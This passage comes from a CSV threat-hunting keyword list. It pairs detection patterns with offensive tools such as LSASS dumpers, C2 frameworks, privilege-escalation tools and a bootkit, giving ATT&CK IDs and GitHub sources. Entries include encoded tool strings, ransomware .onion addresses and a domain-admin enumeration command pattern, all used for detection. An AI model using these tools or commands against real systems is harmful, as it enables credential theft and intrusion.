LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63129" "*WwAhAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAZgBhAGkAbABlAGQALgAgAEUAeABpAHQAaQBuAGcAIABzAGMAcgBpAHAAdAAuAA==*",".{0,1000}WwAhAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAZgBhAGkAbABlAGQALgAgAEUAeABpAHQAaQBuAGcAIABzAGMAcgBpAHAAdAAuAA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63130" "*WwAqAF0AIABBAHQAdABlAG0AcAB0AGkAbgBnACAAcwB0AGUAYQBsAHQAaAB5ACAATABTAEEAUwBTACAAZAB1AG0AcAAgAHUAcwBpAG4AZwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAByAGUAZgBsAGUAYwB0AGkAbwBuAC4ALgAuAA==*",".{0,1000}WwAqAF0AIABBAHQAdABlAG0AcAB0AGkAbgBnACAAcwB0AGUAYQBsAHQAaAB5ACAATABTAEEAUwBTACAAZAB1AG0AcAAgAHUAcwBpAG4AZwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAByAGUAZgBsAGUAYwB0AGkAbwBuAC4ALgAuAA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63131" 
"*WwAqAF0AIABEAG8AbgBlAC4AIABDAGgAZQBjAGsAIAAkAHsAXwAvAD0AXABfAC8AXABfAF8ALwBcAF8ALwA9AFwALwA9AH0AIABmAG8AcgAgAHQAaABlACAAZgBpAG4AYQBsACAAYQByAGMAaABpAHYAZQAgAGkAZgAgAHMAdQBjAGMAZQBzAHMAZgB1AGwALgA=*",".{0,1000}WwAqAF0AIABEAG8AbgBlAC4AIABDAGgAZQBjAGsAIAAkAHsAXwAvAD0AXABfAC8AXABfAF8ALwBcAF8ALwA9AFwALwA9AH0AIABmAG8AcgAgAHQAaABlACAAZgBpAG4AYQBsACAAYQByAGMAaABpAHYAZQAgAGkAZgAgAHMAdQBjAGMAZQBzAHMAZgB1AGwALgA\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63132" "*WwArAF0AIABDAG8AbQBwAHIAZQBzAHMAaQBvAG4AIABjAG8AbQBwAGwAZQB0AGUAZAA6ACAAJAB7AF8ALwA9AFwAXwAvAFwAXwBfAC8AXABfAC8APQBcAC8APQB9AA==*",".{0,1000}WwArAF0AIABDAG8AbQBwAHIAZQBzAHMAaQBvAG4AIABjAG8AbQBwAGwAZQB0AGUAZAA6ACAAJAB7AF8ALwA9AFwAXwAvAFwAXwBfAC8AXABfAC8APQBcAC8APQB9AA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63133" "*WwArAF0AIABEAHUAbQBwACAAZgBpAGwAZQAgAGUAbgBjAHIAeQBwAHQAZQBkACAAcwB1AGMAYwBlAHMAcwBmAHUAbABsAHkALgA=*",".{0,1000}WwArAF0AIABEAHUAbQBwACAAZgBpAGwAZQAgAGUAbgBjAHIAeQBwAHQAZQBkACAAcwB1AGMAYwBlAHMAcwBmAHUAbABsAHkALgA\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63134" 
"*WwArAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAYwByAGUAYQB0AGUAZAAgAHMAdQBjAGMAZQBzAHMAZgB1AGwAbAB5AC4A*",".{0,1000}WwArAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAYwByAGUAYQB0AGUAZAAgAHMAdQBjAGMAZQBzAHMAZgB1AGwAbAB5AC4A.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63135" "*WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA*",".{0,1000}WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","63136" "*WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA*",".{0,1000}WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63137" 
"*WwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQAkAHgAPQB7AHcAaABvAGEAbQBpACAALwBhAGwAbAA7AGgAbwBzAHQAbgBhAG0AZQB9ADsAJAB4AC4AaQBuAHYAbwBrAGUAKAApAA*",".{0,1000}WwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQAkAHgAPQB7AHcAaABvAGEAbQBpACAALwBhAGwAbAA7AGgAbwBzAHQAbgBhAG0AZQB9ADsAJAB4AC4AaQBuAHYAbwBrAGUAKAApAA.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#base64","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","63138" "*www.4everproxy.com/tor-proxy*",".{0,1000}www\.4everproxy\.com\/tor\-proxy.{0,1000}","offensive_tool_keyword","4everproxy","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://www.4everproxy.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63140" "*www.ampliasecurity.com/research/wce12*",".{0,1000}www\.ampliasecurity\.com\/research\/wce12.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","1","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","63142" "*www.bad-rat.de.vu*",".{0,1000}www\.bad\-rat\.de\.vu.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","63145" 
"*www.crackmd5.ru*",".{0,1000}www\.crackmd5\.ru.{0,1000}","offensive_tool_keyword","crackmd5.ru","site to crack md5 hashes used by Dispossessor ransomware groups and many others","T1003.002 - T1027 - T1213","TA0006 - TA0008 - TA0040","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63146" "*www.exploit-db.com/download/*",".{0,1000}www\.exploit\-db\.com\/download\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","63148" "*www.ftp.ne.jp/Linux/packages/blackarch/*/os/*",".{0,1000}www\.ftp\.ne\.jp\/Linux\/packages\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","63149" "*www.kali.org/get-kali/*",".{0,1000}www\.kali\.org\/get\-kali\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","63152" "*www.leviathansecurity.com/blog/tunnelvision*",".{0,1000}www\.leviathansecurity\.com\/blog\/tunnelvision.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & 
Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","63153" "*www.mirrorservice.org/sites/blackarch.org/blackarch/*/os/*",".{0,1000}www\.mirrorservice\.org\/sites\/blackarch\.org\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","63158" "*www.nicerat.com*",".{0,1000}www\.nicerat\.com.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","63159" "*www.revshells.com*",".{0,1000}www\.revshells\.com.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","63161" "*www.securityfocus.com/archive/1/514379*",".{0,1000}www\.securityfocus\.com\/archive\/1\/514379.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","63162" "*www.tinymet.com*",".{0,1000}www\.tinymet\.com.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - 
T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","1","N/A","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","63165" "*www.tor2web.org*",".{0,1000}www\.tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by means of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","63166" "*www.vsecurity.com/download/tools/*",".{0,1000}www\.vsecurity\.com\/download\/tools\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","63167" "*www.wfuzz.org*",".{0,1000}www\.wfuzz\.org.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","63168" "*wxfuzz.bat*",".{0,1000}wxfuzz\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","63170" "*wxfuzz.py*",".{0,1000}wxfuzz\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 
- T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","63171" "*wxxp3rny7w3j6gkel56iomdw2ztfzqxlsdw3fyezrnohgh767bau6dqd.onion*",".{0,1000}wxxp3rny7w3j6gkel56iomdw2ztfzqxlsdw3fyezrnohgh767bau6dqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63172" "*wy35mxvqxff4vufq64v4rrahxltn6ry33hjoogydwti6wbqutjaxrvid.onion*",".{0,1000}wy35mxvqxff4vufq64v4rrahxltn6ry33hjoogydwti6wbqutjaxrvid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63173" "*WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4=*",".{0,1000}WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","63174" "*WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg==*",".{0,1000}WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","63175" "*WytdIEluamVjdGVkIHRoZSA=*",".{0,1000}WytdIEluamVjdGVkIHRoZSA\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","63176" "*-x *net group *Domain Admins* /domain*",".{0,1000}\-x\s.{0,1000}net\sgroup\s.{0,1000}Domain\sAdmins.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","63177" "*X32_ClSp_Tcp_Exe.exe*",".{0,1000}X32_ClSp_Tcp_Exe\.exe.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","63178" "*x64/CelestialSpark.asm*",".{0,1000}x64\/CelestialSpark\.asm.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","63179" "*x64\Debug\JuicyPotato*",".{0,1000}x64\\Debug\\JuicyPotato.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","63180" "*x64\Release\JuicyPotato*",".{0,1000}x64\\Release\\JuicyPotato.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - 
TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","63181" "*X64_ClSp_Tcp_Exe.exe*",".{0,1000}X64_ClSp_Tcp_Exe\.exe.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","63182" "*x64PELoader/*.exe*",".{0,1000}x64PELoader\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63183" "*x64win-DynamicNoNull-WinExec-PopCalc-Shellcode*",".{0,1000}x64win\-DynamicNoNull\-WinExec\-PopCalc\-Shellcode.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","63184" "*x86_64-unknown-uefi*",".{0,1000}x86_64\-unknown\-uefi.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense 
Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","63185" "*x86PELoader/*.exe*",".{0,1000}x86PELoader\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63186" "*x86PELoader/test_agent_dll*",".{0,1000}x86PELoader\/test_agent_dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63187" "*x86PELoader/test_agent_exe*",".{0,1000}x86PELoader\/test_agent_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63188" "*x86PELoader/test_proxy_dll*",".{0,1000}x86PELoader\/test_proxy_dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63189" 
"*x86PELoader/test_proxy_exe*",".{0,1000}x86PELoader\/test_proxy_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63190" "*x90skysn3k/brutespray*",".{0,1000}x90skysn3k\/brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","63191" "*xaitax/Chrome-App-Bound-Encryption-Decryption*",".{0,1000}xaitax\/Chrome\-App\-Bound\-Encryption\-Decryption.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential 